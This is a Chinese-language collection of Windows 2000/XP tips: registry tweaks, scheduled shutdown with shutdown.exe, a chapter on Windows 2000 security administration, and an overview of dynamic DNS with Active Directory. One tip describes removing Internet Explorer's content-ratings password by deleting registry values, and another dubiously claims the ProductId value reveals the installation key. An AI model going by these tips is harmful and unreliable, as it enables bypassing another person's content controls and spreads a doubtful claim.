    注意：在这里使用2的N次方（N=1，2，3，……）来代表一个驱动器号，如：A为 1， B为 2， C为 4， D为 8， E为 16， F为 32， G为 64……还有，如果你要隐藏A、B、C三个驱动器，输入7即可，因为7=1＋2＋4。
    20．定制按钮字体颜色
    选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USER\Control Panel\Colors分支，然后双击右边窗口中的“Buttontext”，将它的键值由原来的“0 0 0”改为“255 0 0”（代表红色）。关闭注册表编辑器重新启动系统后，按钮上的字体将显示为红色。
    21．在汉字后加空格
    你可以通过修改注册表，在Windows 2000中文版中实现在汉字后面加上空格的功能，以帮助某些英文排版软件（如PageMaker 6.5等）切词。方法是：选择“本地机器上的HKEY_CURRENT_USER”子窗口，定位到HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion分支，在该分支的下一级分支中，你可以看见许多种输入法，如：全拼、智能ABC、郑码等。单击它们之一，如：全拼，你就可以在右边窗口中看到键值名“插空格”，它的值可以为0（表示不插入空格）或1（表示插入空格），双击“插空格”，把它的键值修改为1即可。
    对于其它的输入法，如果它们没有“插空格”的键值名，可以新建并把它的键值设为1。
    22．消除软件显示乱码
    选择“本地机器上的HKEY_LOCAL_MACHINE”子窗口，定位到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\fontassoc\Associated CharSet分支。将右边窗口内的“SYMBOL（02）”的键值（这是系统的机内码）改为“NO”即可。
    23．找回丢失的安装密码
    如果你不小心将Windows 2000的安装密码弄丢了，找回它的办法是：选择“本地机器上的HKEY_LOCAL_MACHINE”子窗口，定位到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion分支，在窗口右边的ProductId键值中，就包含了安装密码的信息。
    24．加入登录信息
    你可以在Windows 2000登录窗口出现之前，弹出一个窗口，上面包含你自己输入的信息。方法是：选择“本地机器上的HKEY_LOCAL_MACHINE”子窗口，定位到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon子键，然后在窗口右边找到“LegalNoticeCaption”和“LegalNoticeText”两个键值。如果没有，可以添加这两个键值。然后在这两个键值内分别输入你自己的信息。关闭注册表编辑器，重新启动系统。
    25．增加执行文件路径
    类似于在DOS中通过Autoexec.bat给执行文件增加path路径，你可以在Windows 2000中通过修改注册表增加执行文件路径。比如要为“C:\Program Files\abc\abc.exe”文件增加路径，可以选择“本地机器上的HKEY_LOCAL_MACHINE”子窗口，定位到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\AppPaths分支，在窗口右边新建一个名为“abc.exe”的主键，选择该主键，将其默认值设为“C:\ProgramFiles\abc\abc.exe”；再新建名为“Path”的主键，将其值设为“C:\ProgramFiles\abc”。这样就可以通过在“运行”命令行中键入“abc.exe”或“abc”来运行该程序了。
    26．去掉IE内的分级审查口令
    选择“本地机器上的HKEY_LOCAL_MACHINE”子窗口，定位到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Policies\Ratings分支，这里保存的是IE下“Internet属性”对话框的“内容”选项卡中的“分级审查”中的口令，该口令是经过加密的。窗口右边记录该口令有两个键值FileName0和Key，且二进制的“key”键值是加过密的。去掉口令的方法即是将Ratings子键下的这两个键值删除，如果没有口令，这个子键无键值。
    下次进入IE，你就可以安全地进入分级审查，并且可以直接跳过输入“旧密码”，加入新密码即可。


Windows XP和2000操作系统自动关机的实现

《一键清理系统垃圾》

Windows XP和2000操作系统自动关机的实现

    如果你想出门，但电脑又正在进行工作，这时就要用到自动关机。大多数实现自动关机的方法都是使用一些第三方软件，这样不仅麻烦，

而且为实现这个小功能而专门动用一个软件，显的小题大做了！其实Windows XP(Windows 2000也可以)自身就具备定时关机的功能，下面我们

就来看看如何实现Windows XP的自动关机。

    Windows XP的关机是由Shutdown.exe程序来控制的，位于Windows＼System32文件夹中
。如果想让Windows 2000也实现同样的效果，可以把Shutdown.exe复制到系统目录下。

    比如你的电脑要在22:00关机，可以选择“开始→运行”，输入“at 22:00 Shutdown -s”，这样，到了22点电脑就会出现“系统关机”对

话框，默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机，可以输入“Shutdown.exe -s -t 3600”，这里表示60分钟后

自动关机，“3600”代表60分钟。

      设置好自动关机后，如果想取消的话，可以在运行中输入“shutdown -a”。另外输入“shutdown -i”，则可以打开设置自动关机对话

框，对自动关机进行设置。

    Shutdown.exe的参数，每个都具有特定的用途，执行每一个都会产生不同的效果，比如“-s”就表示关闭本地计算机，“-a”表示取消关

机操作，下面列出了更多参数，大家可以在Shutdown.exe中按需使用。

用法: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy]

       没有参数　　　　　　　　显示此消息(与 ? 相同)
       -i　　　　　　　　　　　显示 GUI 界面，必须是第一个选项
       -l　　　　　　　　　　　注销(不能与选项 -m 一起使用)
       -s　　　　　　　　　　　关闭此计算机
       -r　　　　　　　　　　　关闭并重启动此计算机
       -a　　　　　　　　　　　放弃系统关机
       -m \\computername　　　 远程计算机关机/重启动/放弃
       -t xx　　　　　　　　　 设置关闭的超时为 xx 秒
       -c "comment"　　　　　　关闭注释(最大 127 个字符)
       -f　　　　　　　　　　　强制运行的应用程序关闭而没有警告
       -d [u][p]:xx:yy　　　　 关闭原因代码
                               u 是用户代码
                               p 是一个计划的关闭代码
                               xx 是一个主要原因代码(小于 256 的正整数)
                               yy 是一个次要原因代码(小于 65536 的正整数)

    -f：强行关闭应用程序

    -m ＼＼计算机名：控制远程计算机

    -i：显示图形用户界面，但必须是Shutdown的第一个选项

    -l：注销当前用户

    -r：关机并重启

    -t时间：设置关机倒计时

    -c "消息内容"：输入关机对话框中的消息内容(不能超127个字符)


安全管理

《一键清理系统垃圾》

安全管理

    好的安全系统可确认试图访问计算环境的个人的身份，防止冒名顶替者的访问、盗窃或者破坏系统资源；保护环境中的特定资源免受用户的不正当访问；为设置和维护用户工作环境中的安全性提供了一种简单而有效的方法，同时防止信息和资源被损坏以及有人未授权访问。
本章主要内容有：
1、安全的基本概念
2、控制对象的访问
3、事件的审核
4、管理磁盘上的数据加密
5、管理安全模板
6、安全配置和分析

    10.1 安全的基本概念
    10.1.1 安全模型
    Windows 2000 安全模型的主要功能是用户身份验证和访问控制。
    用户身份验证: Windows 2000 安全模型包括用户身份验证的概念，这种身份验证赋予用户登录系统访问网络资源的能力。在这种身份验证模型中，安全性系统提供了两种类型的身份验证：交互式登录(根据用户的本地计算机或 Active Directory 帐户确认用户的身份)和网络身份验证（根据此用户试图访问的任何网络服务确认用户的身份）。为提供这种类型的身份验证，Windows 2000 安全系统包括了三种不同的身份验证机制：Kerberos V5、公钥证书和 NTLM（与 Windows NT 4.0 系统兼容）。

基于对象的访问控制：通过用户身份验证，Windows 2000 允许管理员控制对网上资源或对象的访问。Windows 2000 通过允许管理员为存储在 Active Directory 中的对象分配安全描述符实现访问控制。安全描述符列出了允许访问对象的用户和组，以及分配给这些用户和组的特殊权限。安全描述符还指定了需要为对象审核的不同访问事件。文件、打印机和服务都是对象的实例。通过管理对象的属性，管理员可以设置权限，分配所有权以及监视用户访问。
    管理员不仅可以控制对特殊对象的访问，也可以控制对该对象特定属性的访问。例如，通过适当配置对象的安全描述符，用户可以被允许访问一部分信息，如只访问员工姓名和电话号码而不能访问他们的家庭住址。
    Active Directory 和安全性：Active Directory 通过使用对象和用户凭据的访问控制提供了对用户帐户和组信息的保护存储。由于 Active Directory 不仅存储用户凭据还存储访问控制信息，因此登录到网络的用户将同时获得访问系统资源的身份验证和授权。例如，用户登录到网络时，Windows 2000 安全系统通过存储在 Active Directory 上的信息来验证用户。然后，当用户试图访问网络上的服务时，系统检查由任意访问控制列表为这一服务定义的属性。由于 Active Directory 允许管理员创建组帐户，因此管理员可以更有效地管理系统的安全性。例如，通过调节文件属性，管理员可以允许组中的所有用户读取文件。这样，访问 Active Directory 中的对象以组成员为基础。

10.1.2 域的体系结构
域和安全性
    域是网络对象的分组。例如：用户、组和计算机。域中所有的对象都存储在 Active Directory 下。Active Directory 可以常驻在某个域中的一个或多个域控制器下。每个域都是一个安全界限，这意味着安全策略和设置（例如系统管理权利、安全策略和访问控制表）不能跨越不同的域。特定域的系统管理员有权设置仅属于该域的策略。由于每个域都是一个安全壁垒，因此不同的系统管理员可以在单位中创建和管理不同的域。 理解域的关键是：
    安全策略可以贯穿整个域来实现。
    为保证数据库的同步，包括安全信息的 Active Directory 会定期复制到域中每个域控制器。
    Active Directory 中的对象可以按组织单位的不同级别进行组织和管理。
    可转移的信任关系可以建立在域树中的域之间。
单个域和多个域
    Windows NT 4.0 限制了目录可以存储的用户帐户的个数。因此，为了适应大计算环境的需要，创建和管理多个域而且每个都拥有自己的用户帐户目录对于单位来说就非常必要了。域通常按以下两种类型进行组织：主域（存储用户和组的帐户）和资源域（存储文件、打印机、应用程序服务等等）。

这种多域的计算环境被称为多主域模式。多主域模式意味着资源域需要与所有的主域具有多个信任关系。这些信任关系允许主域的用户访问资源域中的资源。
    通过扩大存储用户、组和计算机帐户的能力，Active Directory 可实现多个域的功能，因此取而代之。通过 Active Directory，系统管理员可以把跨越多个域的所有帐户（过去必须存储在主域中）和所有资源（过去必须存储在资源域中）合并到单个域中。出于管理目的，系统管理员可以在域中将对象分组到不同组织单位 (OU) 中以维持对象的逻辑分组。然而，在某些情况下，用户出于策略原因可能希望保留多个域。
    可转移的信任关系
    当用户将对象从多个域转到单个域时，会降低必须建立和保持的域信任关系的数量。同样，将域合并成单个域林时，这些域将自动建立可转移的信任关系，减少了在域之间手动建立信任关系所需的数量。要访问域林中所有其他域，每个域同域林中的另一个域只需要一个信任关系。
    服务器角色
    域中的服务器担当下面的其中一种角色：
    域控制器运行 Active Directory 并且提供身份验证和策略。
    成员服务器不提供 身份验证和策略，常作为文件、应用程序、数据库、Web服务器等使用。

10.1.3 身份验证
    身份验证是系统安全性的一个基本方面。它负责确认试图登录域或访问网络资源的任何用户的身份。Windows 2000 身份验证允许对整个网络资源进行单独登记。采用单独登记的方法，用户可以使用单个密码或智能卡一次登录到域，然后通过身份验证向域中的所有计算机表明身份。
    Windows 2000 支持几种工业标准的身份验证类型。验证用户身份时，Windows 2000 依据多种要素使用不同种类的身份验证。Windows 2000 支持的身份验证类型有：
Kerberos V5 身份验证
    安全套接字层 (SSL) 和传输层安全性 (TLS) 的身份验证
NTLM 身份验证
    在 Windows 2000 中，NTLM 被用作域中两台计算机之间事务的身份验证协议，其中一台或两台计算机运行 Windows NT 4.0 或更早版本。Windows 2000 在默认情况下以混合模式网络配置安装。混合模式的网络配置使用 Windows NT 4.0 和 Windows 2000 的任意组合系统。如果没有混合模式网络，可以在域控制器中转换为本地模式来禁用 NTLM 身份验证。

10.1.4 授权
    Windows 2000 的安全性建立在身份验证和授权之上。
    管理员可以指派特定权利组帐户或单个用户帐户。
    用户权利定义了本地级别上的功能。虽然用户权利可以应用于单个的用户帐户，但最好是在组帐户基础上管理。这样可以确保作为组成员登录的帐户将自动继承该组的相关权利。通过对组而不是对单个用户指派用户权利，可以简化用户帐户管理的任务。当组中的用户都需要相同的用户权利时，用户可以一次对该组指派用户权利，而不是重复地对每个单独的用户帐户指派相同的用户权利。
    对组指派的用户权利应用到该组的所有成员（在它们还是成员的时候）。如果用户是多个组的成员，则用户权利是累积的，这意味着用户有多组权利。指派给某个组的权利只有在特定登录权利的情况下才会与指派给其他组的权利发生冲突。然而，指派给某个组的用户权利通常不会与指派给其他组的权利冲突。要删除用户的权利，管理员只需简单地从组中删除用户。在这种情况下，用户不再拥有指派给这个组的权利。
    用户权利有两种类型：特权和登录权利。
§　特权。特权的一个典型范例就是备份文件和目录的权利。
§　登录权利。登录权利的一个典型范例就是登录本地系统的权利。

10.1.5 审核
    安全审核是 Windows 2000 的一项功能，负责监视各种与安全性有关的事件。监视系统事件对于检测入侵者以及危及系统数据安全性的尝试是非常必要的。
    应该被审核的最普通的事件类型包括：
§　访问对象，例如文件和文件夹
§　户和组帐户的管理
§　用户登录以及从系统注销时
    除了审核与安全性有关的事件，Windows 2000 还生成安全日志并提供了查看日志中所报告的安全事件的方法。

10.1.6 安全策略
    安全设置定义了系统的安全相关操作。通过对 Active Directory 中组策略对象的使用，系统管理员可以集中应用保护企业系统所要求的安全级别。
    确定包括多台计算机的组策略对象的设置时，必须考虑给定站点、域或单位的组织和功能特征。例如，销售部门的计算机和财务部门的计算机对安全级别的需要就大不一样。
安全设置
    安全设置包括安全策略（帐户和本地策略）、访问控制（服务、文件、注册表）、事件日志、组成员（受限的组）、网际协议 (IP) 的安全策略和公钥策略。
安全模板
    安全模板是安全配置的物理表现：一组安全设置应该存储于一个文件中。Windows 2000 包括一组以计算机的角色为基础的安全模板：从低安全域客户端的安全设置到非常安全的域控制器。这些模板可用于创建自定义安全模板，修改模板或者作为自定义安全模板的基础。
安全配置工具
    管理员可使用安全模板管理单元来定义和使用安全模板。
    管理员可使用安全配置和分析管理单元来配置和分析本地的安全性。
    管理员可使用组策略管理单元来配置 Active Directory 中的安全性。

10.1.7 数据保护
    数据的保密性和完整性开始于网络的身份验证。用户可以通过适当的凭据（安全的密码或者公钥凭据）在网络上登录，并在此过程中获得访问存储数据的权限。
    Windows 2000 支持两种数据保护方式：存储数据和网络数据。以下部分介绍这两种类型的保护方式。
    存储数据的保护
    保护存储的数据（联机或是脱机）可以通过：
    文件加密系统 (EFS)：EFS 使用公钥加密技术对本地的 NTFS 数据进行加密。
    数字签名:数字签名对软件组件进行签名以确保它们的合法性。
    网络数据的保护
    在用户的工作环境（局域网和子网）中的网络数据通过身份验证协议来保护它的安全。用户也可以选择其他的安全级对用户工作环境中的网络数据进行加密。使用网际协议 (IP) 的安全机制，用户可以为指定的客户端或某个域中的所有客户端的所有网络通讯数据进行加密。
传入及传出用户所在工作环境的网络数据（通过内部网、外部网或 Internet 网关）可以通过使用以下实用程序进行保护：
    网际协议安全。对客户端的所有 TCP/IP 通讯进行加密。
    路由和远程访问。配置远程访问协议和路由。
    代理服务器。为站点提供防火墙和代理服务器。
    另外，象 Microsoft Exchange、Microsoft Outlook 和 Microsoft Internet Explorer 这样的程序都提供了某个站点内或者整个网络上的信息和事务的公钥加密。

10.1.8 公钥基础结构
    在这个信息互连的时代，单位的网络可能包括内部网、Internet 站点和外部网这些都有可能被一些未经授权、蓄意盗阅或更改单位数字信息财产的个人访问。
    有许多潜在的机会可未经授权访问网络上的信息。个人可以尝试监视或更改类似于电子邮件、电子商务和文件传输这样的信息流。用户的单位可能与合作伙伴在限定的范围和时间内进行项目合作，有些雇员用户虽然一无所知，但却必须给他们一定的权限访问用户的部分信息资源。如果用户的用户为了访问不同安全系统需要记住许多密码，他们可以会选择一些防护性较差或很普通的密码，以便于记忆。这不仅给黑客提供一个容易破解的密码，而且还提供了众多安全系统和存储数据的访问。
    那么，系统管理员怎样才能确定正在访问信息的用户的身份而且利用身份对被访问的信息进行控制呢？另外，系统管理员怎样才能轻松而安全地分发和管理单位中的身份凭证呢？这些都是可以通过仔细规划的公钥基础结构解决的问题。
    通常缩写为 PKI 的公钥系统是由数字证书、证书颁发机构 (CA) 以及核实和验证通过公钥加密方法进行电子交易的每一方的合法性的其他注册颁发机构所构成的系统。尽管作为电子商务必要组成部分的公钥基础结构 (PKI) 已被广泛应用，但它仍然在发展之中。

10.2 控制对象的访问
1.设置、查看、更改或删除文件和文件夹权限
    步骤1 打开 "Windows 资源管理器"，然后定位到用户要设置权限的文件和文件夹。
    步骤2 右键单击该文件或文件夹，单击"属性"，然后单击"安全"选项卡，
如图 10.1

步骤3 执行以下任一项操作： 要设置新组或用户的权限，请单击"添加"。按照域名\名称的格式键入要设置权限的组或用户的名称，然后单击"确定"关闭对话框。
    要更改或删除现有的组或用户的权限，请单击该组或用户的名称。
    步骤4 如果必要，请在"权限"中单击每个要允许或拒绝的权限的"允许"或"拒绝"。 或者，若要从权限列表中删除组或用户，请单击"删除"。
注意：
    只能在格式化为使用 NTFS 的驱动器上设置文件和文件夹权限。
    要更改访问权限，用户必须是所有者或已经由所有者授权执行该操作。
    无论保护文件和子文件夹的权限如何，被准许对文件夹进行完全控制的组或用户都可以删除该文件夹内的任何文件和子文件夹。
    如果"权限"下的复选框为灰色，或者没有"删除"按钮，则文件或文件夹已经继承了父文件夹的权限。

2.设置、查看或删除共享文件夹或驱动器的权限
    步骤1 打开 "Windows 资源管理器"，然后定位到要设置权限的共享文件夹或驱动器。
    步骤2 右键单击共享文件夹或驱动器，然后单击"共享"。
    步骤3 在"共享"选项卡上，单击"权限"。
    步骤4 要设置共享文件夹权限，请单击"添加"。键入要设置权限的组或用户的名称，然后单击"确定"关闭对话框。
要删除权限，请在"名称"中选择组或用户，然后单击"删除"。
    步骤5 在"权限"中，如果需要，请对每个权限单击"允许"或"拒绝"。如图

3.取得文件或文件夹的所有权
    步骤1 打开 "Windows 资源管理器"，然后定位到要取得其所有权的文件或文件夹
    步骤2 右键单击该文件或文件夹，单击"属性"，然后单击"安全"选项卡
    步骤3 单击"高级"，然后单击"所有者"选项卡 ，如图10.2
    步骤4 单击新的所有者，然后单击"确定"

注意
    选中"替换子容器和对象的所有者"复选框，可以更改目录树中所有子容器和对象的所有者。
可以两种方式转让所有权：
    当前所有者可以授予其他人"取得所有权"权限，允许这些用户在任何时候取得所有权。
    管理员可以获得计算机中任何文件的所有权。但是，管理员不能将所有权转让给其他人。该限制可以保持管理员的责任。
对子域或组织单位委派控制
    步骤1 打开 Active Directory 用户和计算机。
    步骤2 在控制台树中，展开域对象以显示子域或组织单位。
    步骤3 右键单击要委派管理的子域或组织单位，然后单击"委派控制"。
    步骤4 完成控制委派向导中的步骤。

10.3 事件的审核
1.设置、查看、更改或删除文件或文件夹的审核
    步骤1 打开 "Windows 资源管理器"，然后定位到想要审核的文件和文件夹
    步骤2 右键单击该文件或文件夹，单击"属性"，然后单击"安全"选项卡
    步骤3 单击"高级"，然后单击"审核"选项卡 ，如图10.3
    步骤4 执行以下任一项操作：
    要设置新组或用户的审核，请单击"添加"。在"名称"中，键入新的用户名，然后单击"确定"，自动打开"审核项"对话框。
    要查看或更改现有组或用户的审核，请单击相应的名称，然后单击"查看/编辑"。
    要删除现有组或用户的审核，请单击相应的名称，然后单击"删除"。跳过步骤 5、6、7。

    步骤5 如果有必要，请在"审核项"对话框中的"应用到"列表中选择要进行审核的位置"应用到"列表只能用于文件夹
    步骤6 在"访问"下，单击要审核的访问的"成功"或"失败"，或这两项
    步骤7 如果要阻止目录树中的文件和子文件夹继承这些审核项，请选中"仅对此容器内的对象和/或容器应用这些审核项"复选框
注意：
    在 Windows 2000 审核对文件和文件夹的访问之前，用户必须使用"组策略"管理单元来启用"审核策略"中的"审核对象访问"设置。否则，在设置文件和文件夹的审核时，将收到错误信息且不会审核任何文件或文件夹。启用了"组策略"中的审核之后，请查看"事件查看器"中的安全日志，以检查试图访问审核的文件和文件夹是成功还是失败。
    只能在格式化为使用 NTFS 的驱动器上设置文件和文件夹审核。
    因为安全日志有大小限制，用户应当仔细选择要审核的文件和文件夹。还应该考虑到用于安全日志的磁盘空间的大小。其最大空间是在"事件查看器"中定义的。

2.查看安全日志
    步骤1 打开"事件查看器"
    步骤2 双击"安全日志"，如图 10.4
    步骤3 在详细信息窗格中，检查审核事件列表。

10.4 管理磁盘上的数据加密
1.指定用于文件加密的远程服务器
    步骤1 打开Active Directory 用户和计算机
    步骤2 找到远程服务器的名称。
    步骤3 右键单击远程服务器名称，然后单击"属性"
    步骤4 选中"信任委派"复选框
2.加密文件或文件夹
    步骤1 在"Windows 资源管理器"中，右键单击想要加密的文件或文件夹，再单击"属性"
    步骤2 单击"常规"选项卡上的"高级" ，如图 10.5
    步骤3 选中"加密内容以便保护数据"复选框

注意：
    只可以加密 NTFS 文件系统卷上的文件和文件夹。
    不能加密压缩的文件或文件夹。如果选中了"压缩内容以便节省磁盘空间"复选框，请清除该复选框，然后选择"加密内容以便保护数据"。
    无法加密系统文件。
    当在远程计算机上加密时，请通过返回文件夹或文件属性确认该文件夹或文件已经加密，方法是单击"高级"，然后检查是否选中了"加密内容以便保护数据"复选框。
    在加密文件夹时，系统将询问是否要同时加密文件夹内的所有文件和子文件夹。如果选择这么做，那么文件夹中当前的和将来要添加的所有文件或子文件夹都将被加密。如果选择仅加密文件夹，则文件夹中当前所有文件和子文件夹将不加密。然而，任何将来被加入文件夹的文件和子文件夹在加入时均被加密。
    在加密单个文件时，系统将询问是否要同时加密包含它的文件夹。如果选择这么做，所有将来添加进文件夹中的文件和子文件夹都将在添加时自动加密。
    创建临时工作文件的程序会损害文件加密的安全性。如果使用这样的程序工作，请在文件夹级别加密，而不要加密单独的文件。

3.将加密的文件或文件夹移动或还原到另一台计算机
    使用 Windows 2000 中的"备份"或任何为 Windows 2000 设计的备份程序将加密文件或文件夹移动或还原到与加密该文件或文件夹不同的计算机上。如果用户已经通过漫游用户配置文件访问到第二台计算机，就不必导入和导出加密证书和私钥，因为它们在用户登录的每台计算机上都可用。
    如果没有通过漫游用户配置文件访问第二台计算机，用户可以使用第一台计算机将加密证书和私钥以 .pfx 文件格式导出到软盘上。为此，在 Microsoft 管理控制台 (MMC) 中使用"证书"中的"导出"命令。然后，在第二台计算机（在此还原加密的文件或文件夹）上，从 MMC 的"证书"中使用"导入"命令从软盘将 .pfx 文件导入到"个人"存储区。

10.5 管理安全模板
    10.5.1 启动安全模板
    步骤1 决定是否将安全模板添加到现有的控制台，或创建新控制台。
§　要创建控制台，请单击"开始"，单击"运行"，然后键入"mmc"，然后单击"确定"。
§　要将安全模板添加到现有的控制台中，打开控制台，然后进行下一步。
    步骤2 在"控制台"菜单上，请单击"添加/删除管理单元"，然后单击"添加"。
    步骤3 选择"安全模板"，单击"添加"，单击"关闭"，然后单击"确定"。 如图 10. 8
    步骤4 在"控制台"菜单上，单击"保存"。
    步骤5 输入指派给此控制台的名称，然后单击"保存"。

在安全模板启动后，用户可以执行以下操作：
§　要自定义预定义安全模板
§　定义安全模板
§　删除安全模板
§　刷新安全模板列表
§　设置安全模板说明
§　将安全模板应用到本地计算机
§　将安全模板导入到"组策略"对象
§　查看有效的安全设置

10.6 安全配置和分析
1.开始安全配置和分析
    步骤1 进行以下某项操作：
要将安全配置和分析添加到新的控制台，请单击"开始"，单击"运行"，然后键入"mmc"并单击"确定"。
要将安全配置和分析添加到现有的控制台中，请直接进行下一步。
    步骤2 在"控制台"菜单上，请单击"添加/删除管理单元"，然后单击"添加"。
    步骤3 选中"安全配置和分析"，然后单击"添加"。
    步骤4 单击"关闭"，然后单击"确定"。
    步骤5 在"控制台"菜单上，单击"保存"。
    步骤6 输入指派给此控制台的名称，然后单击"保存"。控制台将出现在"我的文档"中，可以在桌面上或从"开始"菜单访问。

2.设置工作的安全数据库
    步骤1 在安全配置和分析管理单元中，请右键单击"安全配置和分析"。详细信息，请参阅相关主题。
    步骤2 请单击"打开数据库"。
    步骤3 选择现有的个人数据库，或键入文件名创建新的个人数据库，如图10.7。
    步骤4 单击"打开"。
    步骤5 如果这不是当前配置使用的数据库，系统将提示用户选择要加载到数据库的安全模板。
    步骤6 如果选择可能已包含模板的现有个人数据库，并且

要替换此模板，而不是将它合并到已存储的模板，请选中"覆盖数据库中现有的配置"。
    步骤7 单击"打开"。
    此数据库现在可以用于配置系统。

3.分析系统的安全性
    步骤1 在安全配置和分析中，设置工作数据库（如果当前没有设置的话）。
    步骤2 右键单击"安全配置和分析"，然后单击"立即分析系统"。
    步骤3 单击"确定"使用默认的分析日志，或输入日志的文件名和有效路径
    当分析它们时，将显示不同的安全区域，如图10.8。一旦完成操作，就可以检查日志文件或复查结果，如图 10.9。

利用"安全配置和分析"用户还可以执行以下任务：
    设置工作的安全数据库
    导入安全模板
    检查安全性分析结果
    配置系统安全性
    编辑基本安全配置
    查看有效的安全设置
    导出安全模板

当需要进行自动的任务分析时，自动的建立和应用模板、分析系统安全性，可以使用Secedit.exe 命令工具，当对多台机器进行分析时，Secedit.exe 工具十分有用。
    Secedit.exe 命令语法如下：
    secedit /analyze
此命令分析系统的安全性。
secedit /analyze [/DB filename ] [/CFG filename ] [/log logpath] [/verbose] [/quiet]
参数
    /DB filename
提供到数据库的路径，此数据库包含执行分析的存储配置。该参数是必需的。如果 filename 指定了新数据库，也必须指定 CFGfilename 参数。
    /CFG filename
该参数只有与 /DB 参数一起使用才有效。它是到安全模板的路径，此安全模板将被导入到数据库中以用于分析。如果没有指定此参数，则根据已存储在数据库中的配置执行分析。
    /log logpath
此过程的日志文件的路径。如果不提供该参数，则使用默认文件。
    /verbose
在分析过程中需要更详细的进度信息。
    /quiet
不使用屏幕和日志文件的输出。使用安全配置和分析将仍然可以查看分析结果。

返回


动态域名系统

《一键清理系统垃圾》

动态域名系统

    目前在RFC2136标准中定义的DNS标准描述了允许DNS动态更新记录的一系列规则，基于这种规则的DNS系统可以称为DDNS。Windows2000包括的DNS系统支持DDNS标准。DDNS是对长期使用的名称解析标准的革新，对网络规划和管理都会产生深远的影响！

    我们知道DNS在大多数NT4的网络中没有什么用，在这些较低层次的网络中，DNS主要用于支持UNIX主机或INTERNET提供的服务。在NT4中首选的本地解析服务是WINS。在NT4网络中，应用NETBIOS名称来识别和定位资源、服务。虽然WINS在NETBIOS网络中实现解析服务较方便快捷，但不幸的是，WINS和其他NETBIOS域名服务并未被广泛接受。在不同种类的主流网络中，域名系统是被认可的域名解析服务，而域名系统的基础是DNS。微软之所以选择WINS而非DNS的主要原因就是因为它支持动态更新，动态更新在网络中是很关键的。但是由于因特网将DNS作为首选的名称解析标准，使用传统的NETBIOS的微软网同因特网的连接就较困难。所以在微软网络中使用DNS已经是势在必行。DDNS将在Windows2000中取代WINS，成为首选的名称解析服务。

    DNS 的主要的功能是主机名解析，即将主机名转换为IP地址，实现TCP/IP网络中的资源通讯。在静态DNS系统中，所有的解析项都是由管理员手工填写的，非常不方便。特别是现在的网络规划中都使用动态主机配置协议（DHCP）来分配客户机的IP 地址，静态DNS是无法支持DHCP的。DDNS比静态DNS有很多优点，它既支持动态更新，又可以兼容于NT4网络，支持手工刷新；它结合WINS的动态能力和传统DNS的稳定性和健壮性。当然，在最近的几年里，只要用户需要WINS继续支持低级客户机和依赖NETBIOS系统的应用程序，WINS和DDNS会共存。但我们的最终目的是取消NETBIOS，统一于因特网的DNS系统实现解析。

    在Windows2000网络中，活动目录（Active Directory）是实现网络管理的先进的目录服务技术。活动目录是由OU、DOMAIN、TREE、FOREST所构成的层次化逻辑结构，网络中的所有资源都以对象的形式组织到活动目录中，便于用户的资源访问和管理员的集中管理。在活动目录中集成了两个重要的Internet工业标准：DNS和LDAP。DNS作为活动目录的定位服务，是必须的；LDAP是Internet标准的目录访问协议，用于访问、检索活动目录中的资源。LDAP是目录存取协议（DAP）的简便版，是一个X.500目录存取协议。Windows2000中不仅兼容LDAP协议，微软建立Windows2000作为LDAP服务器，用LDAP来读写活动目录。为了定位能服务于LDAP请求的Windows2000服务器，客户级必须首先向DNS服务器发送服务器定位解析请求。Windows2000的DDNS服务器包含每一个LDAP服务器的服务资源（SRV）记录。通常可以在Windows2000的DDNS服务器中找到LDAP SRV记录的列表，内容如下：

    _ldap._tcp.DnsDomainName.
    _ldap._tcp.SiteName._sites.DnsDomainName.
    _ldap._tcp.dc._msdcs.DnsDomainName.
    _ldap._tcp.SiteName._sites.dc._msdcs.DnsDomainName.
    _ldap._tcp.pdc._msdcs.DnsDomainName.
    _ldap._tcp.gc._msdcs.DnsForestName.
    _ldap._tcp.SiteName._sites.gc._msdcs.DnsForestName.
    _gc._tcp.DnsForestName.
    _gc._tcp.SiteName._sites.DnsForestName.
    _ldap._tcp.DomainGuid.domains._msdcs.DnsForestName.

    以上SRV记录标识LDAP服务器通过TCP协议定位特殊的资源。例如，为了找到mycompany.com域的域控制器，客户需要查询DDNS来解析ldap.tcp.mycompany.com到IP地址的转换.这里要注意一个问题，虽然Windows2000中强烈建议支持DNS动态刷新，但并不严格要求，而支持SRV记录是最小的要求。实际上，在Windows2000网络中，无论大小，在不能动态更新的情况下执行DNS是不实际的。如果不支持动态更新，就需要手工添加和更新DNS中的SRV记录。

    在Windows2000网络中，公司的活动目录域名空间，反映了自己的DDNS名称空间。在活动目录中的域在DDNS中也应有。当组建公司的DDNS结构时，必须考虑域和子域在活动目录中的使用方式。活动目录的设计对DDNS的设计有很大影响。两者的设计应很好地结合起来！

    当生成活动目录的域时，它既是活动目录的名称空间中的域又是DDNS的名称空间中的域。它在活动目录中是一个物理的节点，在DDNS中是一个区域。当解析网络上的客户机时，客户机需根据存储在活动目录中的帐户信息说明来确认它的登录，且客户机必须在DDNS的区域中动态的注册。例如，一个客户机用一个易解析的名字登录活动目录如client@mycompany.com，将用其主机名和IP地址更新DDNS。在DDNS完成动态更新后，一条A纪录就存在于DDNS中了，将用于解析查询。让mycompany.com域的其他成员可以访问它。这里要注意，活动目录的域成员在DDNS上存储的主机纪录，应该有相同的域名称。活动目录的名称空间和DDNS的名称空间应该是相同的。如果活动目录要求独立的域，DDNS应该反映出这种结构。

    在理想的情况下，设计DDNS和设计活动目录的目的是一样的常用的DNS设计标准如下：

    最顶层的域应该保持不变，这个域通常是公司的名称，如mycompany.com；

    由国内和国际业务的公司经常将DNS的名称空间分成子域，每个子域代表不同的管理任务；

    当单个域很大时，应该把它分成几个子域。这样会减少管理域的工作量，并减少DNS服务器的负荷量；

    公司也可以根据公司的地理分布、管理机构及IT支持结构来建立相应的子域。

